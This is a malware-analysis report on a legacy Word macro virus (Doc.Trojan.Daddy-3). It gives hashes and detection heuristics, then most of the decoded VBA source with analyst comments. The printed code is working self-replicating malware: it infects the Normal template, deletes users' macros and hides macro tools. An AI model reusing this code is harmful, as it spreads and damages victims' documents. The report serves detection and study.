Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 63a177b650d93811…

MALICIOUS

Office (OLE)

240.0 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7203ddd5e2e13abff19e32bec32d0236 SHA-1: aceeb6e92b2468a4a6b28cfe2d8f891bb610a47e SHA-256: 63a177b650d938112aabe6b3226bcfe032adfaaaf677dc053f79484aa5b50e4b
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of legacy macro viruses, including WordBasic markers and the presence of VBA macros within the AutoOpen and Auto_Close functions. The script attempts to modify the Normal template and customizes command bars, indicating an intent to establish persistence or facilitate further malicious actions. The ClamAV detections further support its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Daddy-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Daddy-3
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12875 bytes
SHA-256: 611a065a994ece75d6a4ab798a5c88269c3349dd6dd19f071b098c2f0cbce58e
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Analyst note: exported header of the document's ThisDocument module.
' VB_Base = "1Normal.ThisDocument" and VB_TemplateDerived = True indicate the
' module is tied to the Normal template, which matches the template-infection
' logic in module "a" below.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Module "a": global state shared by the replication routines that follow.
Attribute VB_Name = "a"
' DokumenAktif: the document currently being processed (set in AutoOpen / Utama).
' mTujuan: the replication target, either a document or NormalTemplate (set in Utama).
Public DokumenAktif As Object, mTujuan As Variant
' nBackup   - a "NewMacros" module was seen in the target project (mMusnahkan).
' mAda      - read in Utama; not assigned anywhere in the visible listing.
' Musnahkan - a module that is not one of the virus's own was found in the target (mMusnahkan).
' Reset     - when True, foreign modules are deleted via Organizer instead of having their code cleared.
' fKeluar   - early-exit flag, set in AutoExec when the macro is not running from NormalTemplate.
' dHitung   - True while Utama is re-run against other open documents (AutoOpen loop).
Public nBackup As Boolean, mAda As Boolean, Musnahkan As Boolean, Reset As Boolean, fKeluar As Boolean, dHitung As Boolean
' Core replication routine (Indonesian "Utama" = "main").
' Chooses the copy direction (NormalTemplate -> document, document -> NormalTemplate,
' or a WIN32S16.DOT/.DLL copy -> NormalTemplate), wipes modules that are not the
' virus's own from the target, copies modules a/a1/a2 into it, marks the project,
' and alters the macro UI so the code is harder to inspect.
' Observable artefacts for detection: NormalTemplate.VBProject changes, the
' project Description "a", removed Tools > Macro control, disabled Alt+F11 /
' Alt+F8 bindings, a new KeyBindings entry and SaveInterval set to 1.
' Returns nothing meaningful; every runtime error is swallowed (On Error Resume
' Next / GoTo Beres).
Function Utama()
On Error Resume Next
   ' Hide the macro tooling: delete the Tools > Macro menu control and disable the
   ' Alt+F11 (VBA editor) and Alt+F8 (Macros dialog) key bindings in the Normal template.
   CommandBars("Tools").Controls("Macro").Delete
   CustomizationContext = NormalTemplate
   FindKey(BuildKeyCode(wdF11, wdKeyAlt)).Disable
   FindKey(BuildKeyCode(wdF8, wdKeyAlt)).Disable
On Error GoTo 0
Dim mNama(2) As String     ' names of the three modules to replicate
Dim tNorm As Object        ' NormalTemplate
Dim mSumber$               ' copy source: a template/document object, later its file path
On Error GoTo Beres
mNama(0) = "a"
mNama(1) = "a1"
mNama(2) = "a2"
' MacroContainer is the template or document that hosts the running macro.
mSumber = MacroContainer
Set tNorm = NormalTemplate
' When re-run from the AutoOpen loop (dHitung = True), DokumenAktif has already
' been set by the caller and the source is forced to the template, unless the
' code is running from the dropped WIN32S16.DOT copy.
If Not dHitung Then
Set DokumenAktif = ActiveDocument
ElseIf mSumber <> "WIN32S16.DOT" Then
mSumber = tNorm
End If
' Resolve direction: template -> active document, active document -> template,
' or WIN32S16.DOT -> template using a .DLL-named file in Options.DefaultFilePath(8)
' (8 is presumably wdStartupPath - verify against the Word object model).
If mSumber = tNorm Then
mSumber = tNorm.FullName: Set mTujuan = DokumenAktif
ElseIf mSumber = DokumenAktif Then
mSumber = DokumenAktif.FullName: Set mTujuan = tNorm
ElseIf mSumber = "WIN32S16.DOT" Then
Set mTujuan = tNorm
mSumber = Options.DefaultFilePath(8) & "\WIN32S16.DLL"
End If
' Remove every module in the target that is not ThisDocument, NewMacros, a, a1 or a2.
mMusnahkan mTujuan
With mTujuan.VBProject
' The target is treated as already infected when no foreign module was found,
' the project Description is "a" and it holds more than two components; in that
' case skip straight to Siaga. Otherwise copy the modules in and set the marker.
If Not (Not Musnahkan And .Description = "a" And .VBComponents.Count > 2) Then
    mGandakan mSumber, mTujuan, mNama
    Musnahkan = False
    .Description = "a"
    If mTujuan = tNorm Then
        ' Template was the target: force a 1-minute autosave, reset the Tools bar,
        ' bind key code 77 + 1024 (presumably Alt+M - verify) to ToolsRecordMacroStart
        ' and save the template so the infection persists.
        Options.SaveInterval = 1
        CustomizationContext = tNorm
        CommandBars("Tools").Reset
        KeyBindings.Add KeyCode:=BuildKeyCode(77, 1024), KeyCategory:=1, _
        Command:="ToolsRecordMacroStart"
        mTujuan.Save
    End If
    ' Re-point the Macro toolbar's second control at ViewVbCode, which this module
    ' defines as an empty Sub, so the button no longer reaches the real command.
    CommandBars("Macro").Controls(2).OnAction = "ViewVbCode"
Else
GoTo Siaga
End If
End With
If mAda = True Then Exit Function
' SiapUlangkan is not present in the visible listing (likely in a1 or a2).
SiapUlangkan
On Error Resume Next
Siaga:
If fKeluar = True Then Exit Function
Exit Function
' Error handler target: any runtime error in the guarded section ends the routine silently.
Beres:
End Function
' Strip foreign macro code from fSmbr's VBA project ("Musnahkan" = "destroy").
' fSmbr: a document or template exposing .VBProject and .FullName.
' Side effects: sets nBackup when a "NewMacros" module exists, and sets
' Musnahkan when any component other than ThisDocument/NewMacros/a/a1/a2 is
' found; such components are either deleted outright (Reset = True) or have
' their code module emptied. Errors are ignored.
Sub mMusnahkan(fSmbr)
On Error Resume Next
Dim mNama As Object
For Each mNama In fSmbr.VBProject.VBComponents
    If mNama.Name = "NewMacros" Then nBackup = True
    If mNama.Name <> "ThisDocument" And mNama.Name <> "NewMacros" _
    And mNama.Name <> "a" And mNama.Name <> "a1" _
    And mNama.Name <> "a2" Then
        Musnahkan = True
        ' Reset selects Organizer deletion (object type 3, presumably
        ' wdOrganizerObjectProjectItems - verify); otherwise the module stays but
        ' every line of its code is deleted, which is what wipes a user's own macros.
        If Reset Then
        Application.OrganizerDelete fSmbr.FullName, mNama.Name, 3
        Else
        mNama.CodeModule.DeleteLines 1, mNama.CodeModule.CountOfLines
        End If
    End If
Next mNama
End Sub
' Copy the named modules from source to target via the Organizer ("Gandakan" = "duplicate").
' fSmbr: source file path; fTjn: target document/template (its .FullName is used);
' mNama: array of module names (a, a1, a2 in Utama).
' Object type 3 is presumably wdOrganizerObjectProjectItems - verify. Errors are ignored,
' so a failed copy leaves no trace in the macro itself.
Sub mGandakan(fSmbr, fTjn, mNama)
On Error Resume Next
Dim aNmak
For Each aNmak In mNama
Application.OrganizerCopy fSmbr, fTjn.FullName, aNmak, 3
Next
End Sub
' Periodic display payload ("Iklan" = "advertisement"): shows the a2 object
' (presumably a UserForm in module a2, not in the visible listing) and
' reschedules itself via Application.OnTime every 15 minutes under the name "a.Iklan".
' The OnTime entry is a detectable runtime artefact; it is first armed from AutoOpen.
Sub Iklan()
On Error Resume Next
a2.Show
Application.OnTime When:=Now + TimeValue("00:15:00"), Name:="a.Iklan"
End Sub
' Replaces Word's built-in FileOpen command so that opening a file through the
' UI re-triggers the infection. wTmp and wFle are not in the visible listing.
' Dialogs(80) is presumably wdDialogFileOpen - verify; a non-zero result means
' the user did not cancel, after which AutoOpen (and therefore Utama) runs.
Sub FileOpen()
On Error Resume Next
wTmp
If Dialogs(80).Show <> 0 Then
wFle
AutoOpen
Else
wFle
End If
End Sub
' Auto-execution entry point (runs when the document is opened).
' 1. Date-triggered message boxes (7 October, 19 May, 14 May) signed "despiro@hotmail.com".
' 2. Disables Ctrl+Break so the macro cannot be interrupted.
' 3. Runs Utama on the active document, then once per other open document.
' 4. After 14 May 1999, schedules a.Iklan to run 15 minutes later (it then repeats itself).
' The OLE_VBA_AUTOOPEN heuristic in the report is keyed on this procedure name.
Sub AutoOpen()
On Error Resume Next
   If Month(Now) = 10 Then GoTo CekTanggal1
   If Month(Now) = 5 Then GoTo CekTanggal2
   GoTo Selesai
CekTanggal1:
   If Day(Now) = 7 Then MsgBox "'Met ulang tahun DaNnY DeSPiRo !", vbInformation, "[ despiro@hotmail.com ]"
   GoTo Selesai
CekTanggal2:
   If Day(Now) = 19 Then MsgBox "'Met ulang tahun YeNi CeLuS !", vbInformation, "[ despiro@hotmail.com ]"
   If Day(Now) = 14 Then MsgBox "Hari jadi DAY.forever !", vbInformation, "[ despiro@hotmail.com ]"
Selesai:
' wdCancelDisabled: Ctrl+Break no longer stops the running macro.
Application.EnableCancelKey = wdCancelDisabled
Utama
' Spread to every other open document: dHitung = True makes Utama use the
' DokumenAktif set here instead of ActiveDocument. 'i' is never declared.
If Documents.Count > 1 Then
    For i = 1 To Documents.Count
    If Documents(i).Name <> ActiveDocument.Name Then
    Set DokumenAktif = Documents(i)
    dHitung = True
    Musnahkan = False
    Utama
    End If
    Next
End If
' Time-gated activation of the recurring Iklan display.
If Now > DateSerial(1999, 5, 14) Then Application.OnTime When:=Now + TimeValue("00:15:00"), Name:="a.Iklan"
End Sub
' Deliberately empty. Utama sets the Macro toolbar's second control's OnAction
' to "ViewVbCode" (VBA names are case-insensitive), so clicking it now does
' nothing instead of opening the code view.
Sub ViewVBCode()
End Sub
Sub AutoExec()
On Error Resume Next
If MacroContainer <> NormalTemplate Then
fKeluar = True
Utama
wTmp
AddIns.
... (truncated)